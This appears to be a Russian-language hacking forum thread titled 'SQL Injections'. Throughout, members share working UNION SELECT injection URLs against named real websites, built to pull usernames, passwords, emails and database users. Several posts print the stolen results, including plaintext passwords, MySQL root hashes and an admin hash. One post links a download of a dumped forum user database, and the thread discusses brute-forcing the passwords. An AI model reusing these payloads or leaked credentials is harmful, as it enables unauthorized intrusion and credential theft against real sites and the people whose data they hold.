SQL Инъекции

TAKEP,

Code:

http://www.divo-ostrov.ru/rus/actions/fotoactions_index.php?id=-10+union+select+1,password,username+from+users+order+by+2,2/*

 

уфф старо =\

 

Code:

http://www.avatary.ru/avatar.php?pid=93+union+select+1,version(),concat(user(),0x3a,0x3a,database()),4,5,6,7,8,9,10,11/*&a=1&w=100&p=12

 

http://forum.siemens-club.ru

Держи kamaz-ист http://forum.siemens-club.ru/viewboard.php?BoardID=-29+union+select+1,concat(username,char(58),password),3,4,5,6,7,8,9,10+from+t_users/*

Всего зарегистрированных членов Клуба: 40264. Из них действительных: 7021
а самое интересное пассы в чистом виде

 

мыльники тоже выводятся, так что хорошая база..да и словарик мона составить ...

 

еще есть колонка icqnumber

 

А там чё за шифрование , md4 ? Подскажите...

 

вы добраоись до админки? Сделайте дамп плиз

 

Там mysql хэш.

 

PHP:

http://arsenal.timglass.co.uk/viewnews.php?newsid=65'

http://www.vestingstadfm.nl/viewnews.php?newsid=24'

http://paxar.bc.ca/viewnews.php?newsID=13'

http://www.newdirect.ru/ibase/index.php?page=brd&id=9'

http://www.lichr.ee/new/index.php?page=3'

http://www.mzss.hr/index.cgi?menu_id=46'



 

Кто сменил юзера? стукни в асю пообщаемся.

 

http://www.oilsbyobletz.com/public/view_text.php?user_id=4%20union%20select%201,2,3,4,5,6,7,8/*

http://www.rusfmpro.ru/index.php?menu%5B0%5D=56&&user_id=-5%20union%20select%201,2,email,4,5,6,7,8,9,0,name,12,13,14,15,16,17%20from%20users/*

http://www.naobcasach.pl/art.php?id=79%20union%20select%201,2,3,4,5,6,7,8,9,0,11,12,13/*

 

офф топ

Ми пад сталом, спасибо побольше бы таких постов...

 

Code:

http://ufs.com.ua/stories/showlaw.php?id=-1+union+select+concat(user,char(58),password),2,3+from+mysql.user/*

root:
nobody:46243a7171240b83
debian-sys-maint:51c3ad74176de8e5
daru:

Code:

http://www.contrast.net.ua/heating/pos.php?id=-1+union+select+1,2,3,4,5/*

Code:

http://www.a2k.org.ua/news.php?id=-1+union+select+1,2,3,4,password,user,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27,28,29,30,31,32,33,34,35,36,37,38+from+users+where+id=1/*

Code:

http://pressa.univ.kiev.ua/news.php?id=-1+union+select+1,2,4,3/*

Code:

http://www.fdr.com.ua/article.php?id=-1+union+select+1,2,3,4,5,6,7,8/*

Code:

http://www.untp.org.ua/index.php?id=-1+union+select+1,2,3,4,5,6/*

Code:

http://www.management.com.ua/news/?id=-1+union+select+1,2,3/*

Code:

http://www.scg.com.ua/mc_news.php?id=-1+union+select+1,2,3,4/*

 

_http://rapidshare.com/files/15758988/base_forum_siemens-club_ru.rar

login pass email icq (txt + xls) 400kb
pass:a-chat

количество записей :12266
6-знаков: 214
7-знаков: 326

Не менее 40 из них брутятся.
Самый стойкий криптографически пасс: ДяДяАдМиНиМоДеРаТоРпРоСтИзАсРа

 

Restko.ru
12000 юзеров

http://restko.ru/print_market.php?market_id=-1+union+select+1,email,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27,28,29,30,pass,32,33+from+user+limit+12000,12001/*
и

http://restko.ru/print_market.php?market_id=-1+union+select+1,login,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27,28,29,30,pass,32,33+from+admin+limit+1,2/*

 

Также может понадобиться:
http://www.restko.ru/usr/
есть таблица id

 

Code:

http://www.novostroy.ru/directrix/details.php?item_id=-1+union+select+1,password,3,name,email,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26+from+users+limit+1,2/*

Code:

http://www.bench-mark.ru/main.php?root_id=&text_id=-1+union+select+1,user(),3,version(),5/*

Code:

http://fpmt.ru/index.php?aid=-1+union+select+version()

Code:

http://www.wnqsport.ru/showtext.php?text_id=-1+union+select+1,2,versioN(),4,5,6/*

Code:

http://www.theolcom.ru/ru/full_text.php?TEXT_ID=-1+union+select+1,2,3,4,table_name,6,7+from+INFORMATION_SCHEMA.TABLES+limit+4,5/*

 

какой то филиал Центр-Телекома
_http://www.kosnet.ru/modules/myarticles/topics.php?op=listarticles&topic_id=-99+union+select+1,2,3,concat(uid,0x3a,uname,0x3a,pass),5+from+kosnet_users/*

пасс сложный пробрутить не удалось

 

Code:

http://gammer.itc.ua/?a=genre&upid=-4+union+select+concat(user,0x3a,password)+from+mysql.user/*

root:7f269a3e6508d1ec

Code:

http://www.ipecac.com/bio.php?id=-44+union+select+1,2,user(),concat(database(),0x3a,0x3a,version())/*

Code:

http://www.iwf.ru/main/bar2.php?idd=-370+union+select+1,concat(username,0x3a,password),3,4,5,6,7,8+from+users/*

от админки пароль в другой таблице, подобрать не смог

Code:

http://www.press.pl/lewa_strona/show.php?idd=-25+union+select+1,2,concat(user(),0x3a,0x3a,version(),0x3a,0x3a,database()),4,5,6,7,8,9,10,11,12,13,14,15/*

Code:

http://www.fcuniversitatea.ro/index.php?idd=-440+union+select+1,concat(convert(version()+using+latin1),0x3a,0x3a,convert(user()+using+latin1),0x3a,0x3a,convert(database()+using+latin1)),3,4,5,6,7,8,9,10,11/*

Code:

http://www.euros.com.ua/goods.php?idd=-15+union+select+1,2,3,concat(version(),0x3a,0x3a,user(),0x3a,0x3a,version()),5,6,7/*&id=4

Code:

http://www.chelindustry.ru/view2.php?idd=-137+union+select+1,2,3,4,5,6,7,8,9,10,concat(version(),0x3a,0x3a,user(),0x3a,0x3a,database()),12,13,14,15/*

Code:

http://www.tol.cz/q-a/index.php?IdD=-15+union+select+concat(version(),0x3a,0x3a,user(),0x3a,0x3a,database())/*

Code:

http://www.miedz.net/rz/zawodnik.php?idd=-106+union+select+1,2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,concat(version(),0x3a,0x3a,user(),0x3a,0x3a,database()),18/*

Code:

http://www.magit.pl/multimedia_new/index.php?idd=-5+union+select+concat(login,0x3a,password),2+from+users/*

admin:a4054b18b2e7f8c3688bbaa418323baf


чё-то на логин\пассы сёдня не проперло